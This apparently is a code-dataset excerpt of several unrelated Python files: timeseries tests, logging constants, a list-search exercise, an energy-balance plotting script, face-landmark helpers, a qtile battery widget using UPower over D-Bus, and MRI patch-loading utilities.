s = self.makeSeries()
self.assertEqual(100, len(s.data))
s.ToDeltas()
self.assertEqual(99, len(s.data))
self.assertEqual([1, 60000], s.data[0])
self.assertEqual([1, 1040000], s.data[-1])
s = timeseries.Timeseries()
for i in range(0, 1000):
s.Append(i, i * 1e6)
s.Normalize(20 * 1e6,
500 * 1e6,
1000 * 1e6,
mode=timeseries.NORMALIZE_MODE_COUNTER)
self.assertEqual(25, len(s.data))
self.assertListEqual(s.data[0], [519, int(500 * 1e6)])
s.ToDeltas()
self.assertEqual(24, len(s.data))
self.assertListEqual(s.data[0], [20, int(500 * 1e6)])
self.assertListEqual(s.data[23], [20, int(960 * 1e6)])
def testNormalizeFillsGapsWithNone(self):
s = timeseries.Timeseries()
for i in range(21, 51):
s.Append(i, (i + 5) * 10000)
for i in range(81, 101):
s.Append(i, (i + 5) * 10000)
s.Normalize(10 * 10000, 10 * 10000, 120 * 10000)
self.assertEqual(11, len(s.data))
self.assertEqual([None, 100000], s.data[0])
self.assertEqual([22.5, 200000], s.data[1])
self.assertEqual([None, 600000], s.data[5])
self.assertEqual([None, 1100000], s.data[-1])
def testMakeIncreasing(self):
s = timeseries.Timeseries()
for i in range(0, 5):
s.Append(i, i * 1000)
for i in range(0, 5):
s.Append(i, (i + 6) * 1000)
self.assertEqual(10, len(s.data))
self.assertEqual([4, 10000], s.data[-1])
s.MakeIncreasing()
self.assertEqual(10, len(s.data))
self.assertEqual([8, 10000], s.data[-1])
def testAddRescale(self):
s1 = timeseries.Timeseries()
for i in range(0, 5):
s1.Append(i, i * 1000)
s2 = timeseries.Timeseries()
for i in range(0, 5):
s2.Append(2 * i, i * 1000)
s1.Add(s2)
for i in range(0, 5):
self.assertEqual(3 * i, s1.data[i][0])
s1.Rescale(1 / 3.0)
for i in range(0, 5):
self.assertEqual(i, s1.data[i][0])
def testMean(self):
s = timeseries.Timeseries()
self.assertEqual(None, s.Mean())
s = self.makeSeries()
self.assertEqual(100, len(s.data))
self.assertEqual(50, s.Mean())
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
StarcoderdataPython
|
4829927
|
# !/usr/bin/python
# coding=utf-8
#
# @Author: LiXiaoYu
# @Time: 2013-10-17
# @Info: Const
# Log types
LOG_SYSTEM = 1 # system log
LOG_QUEUE = 2 # queue log
# Log levels
CRITICAL = 50 # critical error: a value beyond its allowed limit, e.g. entering 25 hours for a 24-hour day
ERROR = 40 # general error
WARNING = 30 # warning: an error that should raise a warning
INFO = 20 # info: program output information
DEBUG = 10 # debug: debugging information
# System level
MEMORY_LIMIT_ON = 1
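if __name__ == "__main__":
    # Usage sketch (illustrative only): these numeric levels match the standard
    # logging module's levels, so they can be passed straight to logging.log().
    import logging
    logging.basicConfig(level=DEBUG)
    logging.log(INFO, "system log entry, type=%s", LOG_SYSTEM)
    logging.log(WARNING, "queue log entry, type=%s", LOG_QUEUE)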
|
StarcoderdataPython
|
1790688
|
<gh_stars>0
def csWhereIsBob(names):
'''
input names - a list of strings
output is an integer which is the location of Bob
if Bob not present return -1
'''
if "Bob" not in names:
return -1
for i in range(len(names)):
if names[i] == "Bob":
return i
print(csWhereIsBob(["Jimmy", "Layla", "Bob"])) # 2
print(csWhereIsBob(["Bob", "Layla", "Kaitlyn", "Patricia"])) # 0
print(csWhereIsBob(["Jimmy", "Layla", "James"])) # -1
|
StarcoderdataPython
|
3316204
|
import os
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
from mpl_toolkits.axisartist.axislines import SubplotZero
# Reading results files
os.chdir(r'C:\Users\pietro\Desktop\MESS2021\testfolder')
techs = pd.read_csv('techinfo.csv',sep =';',index_col='timestamp',parse_dates=True)
build = pd.read_csv('buildingsenergybalances.csv',sep =';',index_col='timestamp',parse_dates=True)
# Day to be simulated
day = '2019-11-15'
## Working on techinfo.csv
techs['1112p'] = 0
techs['1112n'] = 0
techs['1112p'] = techs.apply(lambda x: x['1112p'] if x['1112']<0 else x['1112'], axis=1)
techs['1112n'] = techs.apply(lambda x: x['1112n'] if x['1112']>0 else x['1112'], axis=1)
techs['1123p'] = 0
techs['1123n'] = 0
techs['1123p'] = techs.apply(lambda x: x['1123p'] if x['1123']<0 else x['1123'], axis=1)
techs['1123n'] = techs.apply(lambda x: x['1123n'] if x['1123']>0 else x['1123'], axis=1)
techs['demtot'] = 0
def f(x):
return x['1011']+x['1062']+x['1072']
techs['demtot'] = techs.apply(f, axis=1)
## Working on buildingsenergybalances.csv
build['1_EnBalanceElectr'] = - build['1_EnBalanceElectr']
build['imp'] = 0
build['exp'] = 0
build['imp'] = build.apply(lambda x: x['imp'] if x['1_EnBalanceElectr']<0 else x['1_EnBalanceElectr'], axis=1)
build['exp'] = build.apply(lambda x: x['exp'] if x['1_EnBalanceElectr']>0 else x['1_EnBalanceElectr'], axis=1)
## Building balance df to graph
techsbal = techs.loc[day][['1031','1112p','1112n','1123p','1123n']]
buildbal = build.loc[day][['imp','exp']]
balance = techsbal
imp = buildbal[['imp']]
exp = buildbal[['exp']]
balance.insert(5,'imp',imp,True)
balance.insert(6,'exp',exp,True)
## Building demand df to graph
demandbal = techs.loc[day][['1011','1062','1072']]
demandtot = techs.loc[day][['demtot']]
## Balance graph
fig1, ax1 = plt.subplots(figsize=(10,5))
#fig1 = plt.figure(figsize=(10,5))
## a subplot with two additional axis, "xzero" and "yzero". "xzero" is
## y=0 line, and "yzero" is x=0 line.
#ax1 = SubplotZero(fig1, 1, 1, 1)
#fig1.add_subplot(ax1)
## make xzero axis (horizontal axis line through y=0) visible.
#ax1.axis["xzero"].set_visible(True)
#ax1.axis["xzero"].label.set_text("Axis Zero")
## make other axis (bottom, top, right) invisible.
#for n in ["bottom", "top", "right"]:
# ax1.axis[n].set_visible(False)
ax1.grid(axis='y',ls='dashed',lw=0.5,zorder=1)
ax1.plot(demandtot, c='black',zorder=3)
ax1.bar(x=balance.index,height=balance['1031'], width=40./24/60,zorder=2)
xpos=balance['1031'].copy()
ax1.bar(x=balance.index,height=balance['1112p'], width=40./24/60,bottom=xpos,zorder=2)
xpos=xpos+balance['1112p'].copy()
ax1.bar(x=balance.index,height=balance['1112n'], width=40./24/60,zorder=2)
xneg=balance['1112n'].copy()
ax1.bar(x=balance.index,height=balance['1123p'], width=40./24/60,bottom=xpos,zorder=2)
xpos=xpos+balance['1123p'].copy()
ax1.bar(x=balance.index,height=balance['1123n'], width=40./24/60,bottom=xneg,zorder=2)
xneg = xneg+balance['1123n']
ax1.bar(x=balance.index,height=balance['imp'], width=40./24/60,bottom=xpos,zorder=2)
xpos=xpos+balance['imp'].copy()
ax1.bar(x=balance.index,height=balance['exp'], width=40./24/60,bottom=xneg,zorder=2)
xneg = xneg+balance['exp']
plt.gca().xaxis.set_major_formatter(DateFormatter("%H"))
plt.ylim(-6,8)
plt.xlabel('time [h]')
plt.ylabel('Energy [kWh]')
plt.title(str(day))
line_labels = ['Total demand','PV', 'Batt discharge', 'Batt charge','H2 discharge','H2 charge', 'import','export']
fig1.legend(labels= line_labels, loc=(0.775,0.54))
## Demand graph
#fig2, ax2 = plt.subplots(figsize=(15,7))
#demandbal.plot(kind='bar',ax=ax2,stacked=True,colormap='viridis')
#
#ticks2 = [tick.get_text() for tick in ax2.get_xticklabels()]
#ticks2 = pd.to_datetime(ticks2).strftime('%H')
#ax2.set_xticklabels(ticks2)
|
StarcoderdataPython
|
3362504
|
from face_recognition import face_landmarks
from .settings import TYPES_OF_ENDPOINTS
def point_dividing_a_line_segment(A, B, offset_from_A):
"""
:param A: coordinates of the start point of a line in 2D Space ([x, y] or (x, y))
:type A: list - [] or tuple - ()
:param B: coordinates of the end point of a line in 2D Space ([x, y] or (x, y))
:type B: list - [] or tuple - ()
    :param offset_from_A: fraction of the Euclidean distance between A and B, where 0.0 corresponds to 0 % and 1.0 to 100 %.
    :type offset_from_A: float
    :return: coordinates of the point along the line from A to B.
    The point lies between points A and B
    and its distance from point A equals (Euclidean distance between A and B) * offset_from_A
A--C------B
:rtype tuple - ()
"""
x = (1 - offset_from_A) * A[0] + offset_from_A * B[0]
y = (1 - offset_from_A) * A[1] + offset_from_A * B[1]
return int(round(x)), int(round(y))
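# Quick worked example (added for clarity): with offset_from_A=0.5 the
# returned point is simply the midpoint of the segment A-B.
# >>> point_dividing_a_line_segment((0, 0), (10, 4), 0.5)
# (5, 2)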
def find_endpoint(coordinates, mode):
"""
:param coordinates: list or tuple of coordinates in 2D Space.
(e.g. [(x, y),(x, y),(x, y)...] or ([x, y],[x, y],[x, y]...))
:type coordinates: list - [] or tuple - ()
:param mode: this parameter indicates which endpoint we look for.
Allowed values of this parameter:
"LEFT" : we look for the point with the minimum 'x' value
"RIGHT": we look for the point with the maximum 'x' value
"BOTTOM": we look for the point with the minimum 'y' value
"TOP": we look for the point with the maximum 'y' value
All the above values are the keys of the TYPES_OF_ENDPOINTS dictionary.
:type mode: string
:return coordinates of the wanted endpoint
:rtype list - [] or tuple - ()
:raises ValueError: if the passed mode ('mode') is not supported by this function.
(If the mode is not one of the keys of the TYPES_OF_ENDPOINTS dictionary.)
"""
supported_modes = list(TYPES_OF_ENDPOINTS.keys())
if mode not in supported_modes:
supported_modes = ", ".join(map(lambda mode: "'" + mode + "'", supported_modes))
raise ValueError("The passed mode: '{mode}' is not supported by this function. "
"The supported modes are: {supported_modes}.".format(mode=mode,
supported_modes=supported_modes))
endpoint_settings = TYPES_OF_ENDPOINTS[mode]
index_of_a_coordinate = endpoint_settings["INDEX_OF_A_COORDINATE"]
comparison_operator = endpoint_settings["COMPARSION_OPERATOR"]
wanted_point = coordinates[0]
for idx in range(1, len(coordinates)):
if comparison_operator(coordinates[idx][index_of_a_coordinate], wanted_point[index_of_a_coordinate]):
wanted_point = coordinates[idx]
return wanted_point
def get_point_relative_to_another_point(endpoint, midpoint):
"""
:param endpoint: coordinates of the start point of a line in 2D Space ([x, y] or (x, y))
:type endpoint: list - [] or tuple - ()
:param midpoint: coordinates of the midpoint of a line in 2D Space ([x, y] or (x, y))
:type midpoint: list - [] or tuple - ()
:return coordinates of the end point of a line in 2D Space ([x, y] or (x, y))
:rtype tuple - ()
"""
return (2 * midpoint[0] - endpoint[0],
2 * midpoint[1] - endpoint[1])
def point_along_a_line_distanced_from_another_point(A, B, offset_from_A):
"""
    :param A: coordinates of a point on the line in 2D space ([x, y] or (x, y))
    :type A: list - [] or tuple - ()
    :param B: coordinates of another point on the line in 2D space ([x, y] or (x, y))
    :type B: list - [] or tuple - ()
    :param offset_from_A: fraction of the Euclidean distance between A and B, where 0.0 corresponds to 0 % and 1.0 to 100 %.
    :type offset_from_A: float
    :return coordinates of the point on the same line.
    The point lies on the opposite side of A from B, at a distance of (Euclidean distance between A and B) * offset_from_A from A
C--A------B
:rtype tuple - ()
"""
point_inside_a_line = point_dividing_a_line_segment(A=A,
B=B,
offset_from_A=offset_from_A)
point_outside_a_line = get_point_relative_to_another_point(endpoint=point_inside_a_line,
midpoint=A)
return point_outside_a_line
def get_faces_landmarks(rgb_array):
"""
:param rgb_array: an RGB image converted into a numpy array (the array has following shape(y, x, 3))
:type rgb_array: numpy.ndarray (https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.html)
:return: a list of dictionaries of face feature locations (eyes, nose, etc)
:rtype list - []
"""
face_landmarks_list = face_landmarks(rgb_array)
return face_landmarks_list
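# Minimal usage sketch (illustrative only; the image filename is hypothetical):
# face_recognition.load_image_file returns the RGB numpy array this helper expects.
if __name__ == "__main__":
    import face_recognition

    rgb = face_recognition.load_image_file("portrait.jpg")  # hypothetical path
    for face in get_faces_landmarks(rgb):
        print(sorted(face.keys()))  # e.g. 'chin', 'left_eye', 'nose_tip', ...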
|
StarcoderdataPython
|
3324375
|
<filename>qtile_extras/widget/upower.py<gh_stars>10-100
# Copyright (c) 2021 elParaguayo
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
from dbus_next.aio import MessageBus
from dbus_next.constants import BusType
from libqtile import bar
from libqtile.log_utils import logger
from libqtile.widget import base
PROPS_IFACE = "org.freedesktop.DBus.Properties"
UPOWER_SERVICE = "org.freedesktop.UPower"
UPOWER_INTERFACE = "org.freedesktop.UPower"
UPOWER_PATH = "/org/freedesktop/UPower"
UPOWER_DEVICE = UPOWER_INTERFACE + ".Device"
UPOWER_BUS = BusType.SYSTEM
class UPowerWidget(base._Widget):
"""
A graphical widget to display laptop battery level.
The widget uses dbus to read the battery information from the UPower
interface.
The widget will display one icon for each battery found or users can
specify the name of the battery if they only wish to display one.
Clicking on the widget will display the battery level and the time to
empty/full.
All colours can be customised as well as low/critical percentage levels.
"""
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
("font", "sans", "Default font"),
("fontsize", None, "Font size"),
("font_colour", "ffffff", "Font colour for information text"),
("battery_height", 10, "Height of battery icon"),
("battery_width", 20, "Size of battery icon"),
("battery_name", None, "Battery name. None = all batteries"),
("border_charge_colour", "8888ff", "Border colour when charging."),
("border_colour", "dbdbe0", "Border colour when discharging."),
("border_critical_colour", "cc0000", "Border colour when battery low."),
("fill_normal", "dbdbe0", "Fill when normal"),
("fill_low", "aa00aa", "Fill colour when battery low"),
("fill_critical", "cc0000", "Fill when critically low"),
("margin", 2, "Margin on sides of widget"),
("spacing", 5, "Space between batteries"),
("percentage_low", 0.20, "Low level threshold."),
("percentage_critical", 0.10, "Critical level threshold."),
(
"text_charging",
"({percentage:.0f}%) {ttf} until fully charged",
"Text to display when charging.",
),
(
"text_discharging",
"({percentage:.0f}%) {tte} until empty",
"Text to display when on battery.",
),
("text_displaytime", 5, "Time for text to remain before hiding"),
]
_screenshots = [
("battery_normal.png", "Normal"),
("battery_low.png", "Low"),
("battery_critical.png", "Critical"),
("battery_charging.png", "Charging"),
("battery_multiple.png", "Multiple batteries"),
("battery_textdisplay.gif", "Showing text"),
]
_dependencies = ["dbus-next"]
def __init__(self, **config):
base._Widget.__init__(self, bar.CALCULATED, **config)
self.add_defaults(UPowerWidget.defaults)
self.batteries = []
self.charging = False
# Initial variables to hide text
self.show_text = False
self.hide_timer = None
self.configured = False
self.add_callbacks({"Button1": self.toggle_text})
def _configure(self, qtile, bar):
base._Widget._configure(self, qtile, bar)
# Define colours
self.colours = [
(self.percentage_critical, self.fill_critical),
(self.percentage_low, self.fill_low),
(100, self.fill_normal),
]
self.status = [
(self.percentage_critical, "Critical"),
(self.percentage_low, "Low"),
(100, "Normal"),
]
self.borders = {True: self.border_charge_colour, False: self.border_colour}
async def _config_async(self):
await self._setup_dbus()
async def _setup_dbus(self):
# Set up connection to DBus
self.bus = await MessageBus(bus_type=UPOWER_BUS).connect()
introspection = await self.bus.introspect(UPOWER_SERVICE, UPOWER_PATH)
object = self.bus.get_proxy_object(UPOWER_SERVICE, UPOWER_PATH, introspection)
props = object.get_interface("org.freedesktop.DBus.Properties")
props.on_properties_changed(self.upower_change)
self.upower = object.get_interface(UPOWER_INTERFACE)
# Get battery details from DBus
self.batteries = await self.find_batteries()
# Is laptop charging?
self.charging = not await self.upower.get_on_battery()
self.configured = await self._update_battery_info()
def max_text_length(self):
# Generate text string based on status
if self.charging:
text = self.text_charging.format(percentage=100, ttf="99:99")
else:
text = self.text_discharging.format(percentage=100, tte="99:99")
# Calculate width of text
width, _ = self.drawer.max_layout_size([text], self.font, self.fontsize)
return width
def calculate_length(self):
# Start with zero width and we'll add to it
bar_length = 0
if not self.configured:
return 0
# We can use maths to simplify if more than one battery
num_batteries = len(self.batteries)
if num_batteries:
# Icon widths
length = (
(self.margin * 2)
+ (self.spacing * (num_batteries - 1))
+ (self.battery_width * num_batteries)
)
bar_length += length
# Add text width if it's being displayed
if self.show_text:
bar_length += (self.max_text_length() + self.spacing) * num_batteries
return bar_length
async def find_batteries(self):
# Get all UPower devices that are named "battery"
batteries = await self.upower.call_enumerate_devices()
batteries = [b for b in batteries if "battery" in b]
if not batteries:
logger.warning("No batteries found. No icons will be displayed.")
return []
# Get DBus object for each battery
battery_devices = []
for battery in batteries:
bat = {}
introspection = await self.bus.introspect(UPOWER_SERVICE, battery)
battery_obj = self.bus.get_proxy_object(UPOWER_SERVICE, battery, introspection)
battery_dev = battery_obj.get_interface(UPOWER_DEVICE)
props = battery_obj.get_interface(PROPS_IFACE)
bat["device"] = battery_dev
bat["props"] = props
bat["name"] = await battery_dev.get_native_path()
battery_devices.append(bat)
# If user only wants named battery, get it here
if self.battery_name:
battery_devices = [b for b in battery_devices if b["name"] == self.battery_name]
if not battery_devices:
err = "No battery found matching {}.".format(self.battery_name)
logger.warning(err)
return []
# Listen for change signals on DBus
for battery in battery_devices:
battery["props"].on_properties_changed(self.battery_change)
await self._update_battery_info(False)
return battery_devices
def upower_change(self, interface, changed, invalidated):
# Update the charging status
asyncio.create_task(self._upower_change())
async def _upower_change(self):
self.charging = not await self.upower.get_on_battery()
asyncio.create_task(self._update_battery_info())
def battery_change(self, interface, changed, invalidated):
# The batteries are polled every 2 mins by DBus so let's just update
# when we get any signal
asyncio.create_task(self._update_battery_info())
async def _update_battery_info(self, draw=True):
for battery in self.batteries:
dev = battery["device"]
percentage = await dev.get_percentage()
battery["fraction"] = percentage / 100.0
battery["percentage"] = percentage
if self.charging:
ttf = await dev.get_time_to_full()
battery["ttf"] = self.secs_to_hm(ttf)
battery["tte"] = ""
else:
tte = await dev.get_time_to_empty()
battery["tte"] = self.secs_to_hm(tte)
battery["ttf"] = ""
battery["status"] = next(x[1] for x in self.status if battery["fraction"] <= x[0])
if draw:
self.qtile.call_soon(self.bar.draw)
return True
def draw(self):
if not self.configured:
return
# Remove background
self.drawer.clear(self.background or self.bar.background)
# Define an offset for widgets
offset = self.margin
# Work out top of battery
top_margin = (self.bar.height - self.battery_height) / 2
# Loop over each battery
for battery in self.batteries:
# Get battery energy level
percentage = battery["fraction"]
# Get the appropriate fill colour
            # This finds the first value in self.colours which is greater than
# the current battery level and returns the colour string
fill = next(x[1] for x in self.colours if percentage <= x[0])
# Choose border colour
if (percentage <= self.percentage_critical) and not self.charging:
border = self.border_critical_colour
else:
border = self.borders[self.charging]
# Draw the border
self.drawer._rounded_rect(
offset, top_margin, self.battery_width, self.battery_height, 1
)
self.drawer.set_source_rgb(border)
self.drawer.ctx.stroke()
# Work out size of bar inside icon
fill_width = 2 + (self.battery_width - 6) * percentage
# Draw the filling of the battery
self.drawer._rounded_rect(
offset + 2, top_margin + 2, fill_width, (self.battery_height - 4), 0
)
self.drawer.set_source_rgb(fill)
self.drawer.ctx.fill()
# Increase offset for next battery
offset = offset + self.spacing + self.battery_width
if self.show_text:
# Generate text based on status and format time-to-full or
# time-to-empty
if self.charging:
text = self.text_charging.format(**battery)
else:
text = self.text_discharging.format(**battery)
# Create a text box
layout = self.drawer.textlayout(
text, self.font_colour, self.font, self.fontsize, None, wrap=False
)
# We want to centre this vertically
y_offset = (self.bar.height - layout.height) / 2
# Set the layout as wide as the widget so text is centred
layout.width = self.max_text_length()
# Draw it
layout.draw(offset, y_offset)
# Increase the offset
offset += layout.width
# Redraw the bar
self.drawer.draw(offsetx=self.offset, offsety=self.offsety, width=self.length)
def secs_to_hm(self, secs):
# Basic maths to convert seconds to h:mm format
m, _ = divmod(secs, 60)
h, m = divmod(m, 60)
        # Need to make sure minutes are zero-padded in case of a single digit
return "{}:{:02d}".format(h, m)
def toggle_text(self):
if not self.show_text:
self.show_text = True
# Start a timer to hide the text
self.hide_timer = self.timeout_add(self.text_displaytime, self.hide)
else:
self.show_text = False
# Cancel the timer as no need for it if text is hidden already
if self.hide_timer:
self.hide_timer.cancel()
self.bar.draw()
def hide(self):
# Self-explanatory!
self.show_text = False
self.bar.draw()
def info(self):
info = base._Widget.info(self)
info["batteries"] = [
{k: v for k, v in x.items() if k not in ["device", "props"]} for x in self.batteries
]
info["charging"] = self.charging
info["levels"] = self.status
return info
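# Config-side usage sketch (illustrative, not shipped with the widget): the
# widget is added to a qtile Bar like any other; "BAT0" and the threshold
# below are hypothetical values, and only documented defaults are overridden.
#
#   from libqtile import bar
#   from qtile_extras.widget.upower import UPowerWidget
#
#   my_bar = bar.Bar(
#       [UPowerWidget(battery_name="BAT0", percentage_low=0.25)],
#       24,
#   )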
|
StarcoderdataPython
|
3316844
|
<filename>UDA/pytorch0.3/DAN/utils/data_load.py
import os
import numpy as np
from nibabel import load as load_nii
import nibabel as nib
from operator import itemgetter
#from libs.CNN.build_model import define_training_layers, fit_model
from operator import add
import torch
from torch.autograd import Variable
import h5py
import glob
from pathlib import Path
import pandas as pd
from collections import defaultdict
def load_target_voxels(train_x_data, options):
# get_scan names and number of modalities used
scans = list(train_x_data.keys())
modalities = train_x_data[scans[0]].keys()
flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
# load images and normalize their intensities
images = [load_nii(image_name).get_data() for image_name in flair_scans]
images_norm = [normalize_data(im) for im in images]
# select voxels with intensity higher than threshold
selected_voxels = [image > options['min_th'] for image in images_norm]
data = []
random_state=42
datatype=np.float32
patch_size = options['patch_size']
for m in modalities:
x_data = [train_x_data[s][m] for s in scans]
images = [load_nii(name).get_data() for name in x_data]
images_norm = [normalize_data(im) for im in images]
# Get all the x,y,z coordinates for each image
centers = [get_mask_voxels(mask) for mask in selected_voxels]
x_patches = [np.array(get_patches(image, centers, patch_size))
for image, centers in zip(images_norm, centers)]
data.append(np.concatenate(x_patches))
X = np.stack(data, axis=1)
return X
def generate_data_patches(x_dict, y_dict, options, dataset_name='ISBI', model=None):
#if os.path.isdir(h5_path) and glob.glob(h5_path+'*.hdf5') and y_dict is not None:
# print('Data patches already exist try to change location option')
#else:
# generate patches
#x_dict, y_dict = get_data_path(options['train_csv_path'], options['modalities'], options['masks'])
h5_path= options['h5_path']
train_csv_path = options['train_csv_path']
f5_path_column_name = 'f5_path' + options['train_count']
train_data = pd.read_csv(train_csv_path)
for idx in x_dict:
train_x_data = {idx: x_dict[idx]}
if y_dict is not None:
train_y_data = {idx: y_dict[idx]}
X, Y, _ = load_training_data(train_x_data, train_y_data, options, model=model)
print(X.shape, Y.shape)
else:
X = load_target_voxels(train_x_data, options)
Y = None
train_y_data = None
print(X.shape)
Path(h5_path).mkdir(parents=True, exist_ok=True)
f5_path = os.path.join(h5_path, 'file_'+idx+'.hdf5')
if dataset_name == 'ISBI':
index = train_data.loc[train_data.patient_id+train_data.study == idx].index[0]
else:
index = train_data.loc[train_data.center_id+'_'+train_data.patient == idx].index[0]
train_data.loc[index, f5_path_column_name] = f5_path
#for i in raw_data:
with h5py.File(f5_path, 'w') as f:
print(X.shape, 'patches', X.shape[0], 'modalities', X.shape[-1])
f.create_dataset("id", data=idx)
f.create_dataset("patches", data=X.shape[0])
f.create_dataset("modalities", data=X.shape[-1])
f.create_dataset(str('X'), data=X)
if Y is not None:
f.create_dataset(str('Y'), data=Y)
train_data.to_csv(train_csv_path, index=False)
def load_data_patches(h5_path, train_csv_path, phase='train', fold=0, options=None):
f5_path_column_name = 'f5_path' + options['train_count']
#phase['train', 'valid', 'all']
# patches generated in hdf5 files load it
if not os.path.isdir(h5_path) and glob.glob(h5_path+'*.hdf5'):
print('Data patches not exist try to generate it first or define correct location')
return
# load patches
# files=glob.glob(options['h5_path']+'*.hdf5')
files = []
df = pd.read_csv(train_csv_path)
if phase == 'train':
files = df.loc[df['fold'] != fold, f5_path_column_name].values
elif phase == 'valid':
files = df.loc[df['fold'] == fold, f5_path_column_name].values
else:
# all files
files = df[f5_path_column_name].values
files_data = {}
files_ref = {}
patches = 0
for file in files:
print(file)
#with h5py.File(raw_path, 'r') as f:
raw_file = h5py.File(file, 'r') # should not close it immediately
# raw_data = raw_file["raw_data"]
raw_data = defaultdict(list)
for i in raw_file.keys():
# to get the matrix: self.data[i][:]
# d.data[i][j][0], d.data[i][j][1]
raw_data[i] = raw_file[i]
patches += raw_data['patches'][()]
patient_id = raw_data['id'][()]
files_data[patient_id] = raw_data
files_ref[patient_id] = raw_file
return files_data, files_ref, patches
def load_training_data(train_x_data,
train_y_data,
options,
model=None,
selected_voxels=None):
'''
Load training and label samples for all given scans and modalities.
Inputs:
train_x_data: a nested dictionary containing training image paths:
train_x_data['scan_name']['modality'] = path_to_image_modality
train_y_data: a dictionary containing labels
train_y_data['scan_name'] = path_to_label
options: dictionary containing general hyper-parameters:
- options['min_th'] = min threshold to remove voxels for training
- options['size'] = tuple containing patch size, either 2D (p1, p2, 1)
or 3D (p1, p2, p3)
- options['randomize_train'] = randomizes data
        - options['fully_conv'] = fully convolutional labels. If False, only the label of the central voxel of each patch is kept.
model: CNN model used to select training candidates
Outputs:
- X: np.array [num_samples, num_channels, p1, p2, p2]
- Y: np.array [num_samples, 1, p1, p2, p3] if fully conv,
[num_samples, 1] otherwise
'''
# get_scan names and number of modalities used
scans = list(train_x_data.keys())
modalities = train_x_data[scans[0]].keys()
# select voxels for training:
    # if no model is passed, training samples are extracted by discarding CSF
    # and darker WM in FLAIR, and using all remaining voxels.
    # if a model is passed, use the trained model to extract all voxels
# with probability > 0.5
if model is None:
flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
selected_voxels = select_training_voxels(flair_scans,
options['min_th'])
elif selected_voxels is None:
selected_voxels = select_voxels_from_previous_model(model,
train_x_data,
options)
else:
pass
# extract patches and labels for each of the modalities
data = []
for m in modalities:
x_data = [train_x_data[s][m] for s in scans]
y_data = [train_y_data[s] for s in scans]
x_patches, y_patches = load_train_patches(x_data,
y_data,
selected_voxels,
options['patch_size'])
data.append(x_patches)
# stack patches in channels [samples, channels, p1, p2, p3]
X = np.stack(data, axis=1)
Y = y_patches
# apply randomization if selected
if options['randomize_train']:
seed = np.random.randint(np.iinfo(np.int32).max)
np.random.seed(seed)
X = np.random.permutation(X.astype(dtype=np.float32))
np.random.seed(seed)
Y = np.random.permutation(Y.astype(dtype=np.int32))
print('shape', Y.shape)
# fully convolutional / voxel labels
if options['fully_convolutional']:
# Y = [ num_samples, 1, p1, p2, p3]
Y = np.expand_dims(Y, axis=1)
else:
# Y = [num_samples,]
if Y.shape[3] == 1:
Y = Y[:, Y.shape[1] // 2, Y.shape[2] // 2, :]
else:
Y = Y[:, Y.shape[1] // 2, Y.shape[2] // 2, Y.shape[3] // 2]
Y = np.squeeze(Y)
return X, Y, selected_voxels
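# Call sketch (illustrative only; scan names and paths are hypothetical, the
# nested dictionary layout mirrors the docstring above):
#   train_x = {'scan01': {'FLAIR': 'scan01_flair.nii.gz', 'T1': 'scan01_t1.nii.gz'}}
#   train_y = {'scan01': 'scan01_lesion_mask.nii.gz'}
#   X, Y, voxels = load_training_data(train_x, train_y, options)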
def normalize_data(im, datatype=np.float32):
"""
zero mean / 1 standard deviation image normalization
"""
im = im.astype(dtype=datatype) - im[np.nonzero(im)].mean()
im = im / im[np.nonzero(im)].std()
return im
def select_training_voxels(input_masks, threshold=2, datatype=np.float32):
"""
Select voxels for training based on a intensity threshold
Inputs:
- input_masks: list containing all subject image paths
for a single modality
- threshold: minimum threshold to apply (after normalizing images
with 0 mean and 1 std)
Output:
- rois: list where each element contains the subject binary mask for
selected voxels [len(x), len(y), len(z)]
"""
# load images and normalize their intensities
images = [load_nii(image_name).get_data() for image_name in input_masks]
images_norm = [normalize_data(im) for im in images]
# select voxels with intensity higher than threshold
rois = [image > threshold for image in images_norm]
return rois
def load_train_patches(x_data,
y_data,
selected_voxels,
patch_size,
random_state=42,
datatype=np.float32):
"""
Load train patches with size equal to patch_size, given a list of
selected voxels
Inputs:
- x_data: list containing all subject image paths for a single modality
- y_data: list containing all subject image paths for the labels
- selected_voxels: list where each element contains the subject binary
mask for selected voxels [len(x), len(y), len(z)]
- tuple containing patch size, either 2D (p1, p2, 1) or 3D (p1, p2, p3)
Outputs:
- X: Train X data matrix for the particular channel
- Y: Train Y labels [num_samples, p1, p2, p3]
"""
    # load images and normalize their intensities
images = [load_nii(name).get_data() for name in x_data]
images_norm = [normalize_data(im) for im in images]
# load labels
lesion_masks = [load_nii(name).get_data().astype(dtype=np.bool)
for name in y_data]
nolesion_masks = [np.logical_and(np.logical_not(lesion), brain)
for lesion, brain in zip(lesion_masks, selected_voxels)]
# Get all the x,y,z coordinates for each image
lesion_centers = [get_mask_voxels(mask) for mask in lesion_masks]
nolesion_centers = [get_mask_voxels(mask) for mask in nolesion_masks]
# load all positive samples (lesion voxels) and the same number
# of random negatives samples
np.random.seed(random_state)
x_pos_patches = [np.array(get_patches(image, centers, patch_size))
for image, centers in zip(images_norm, lesion_centers)]
y_pos_patches = [np.array(get_patches(image, centers, patch_size))
for image, centers in zip(lesion_masks, lesion_centers)]
indices = [
np.random.permutation(range(0, len(centers1))).tolist()[:len(centers2)]
for centers1, centers2 in zip(nolesion_centers, lesion_centers)]
nolesion_small = [
itemgetter(*idx)(centers)
for centers, idx in zip(nolesion_centers, indices)]
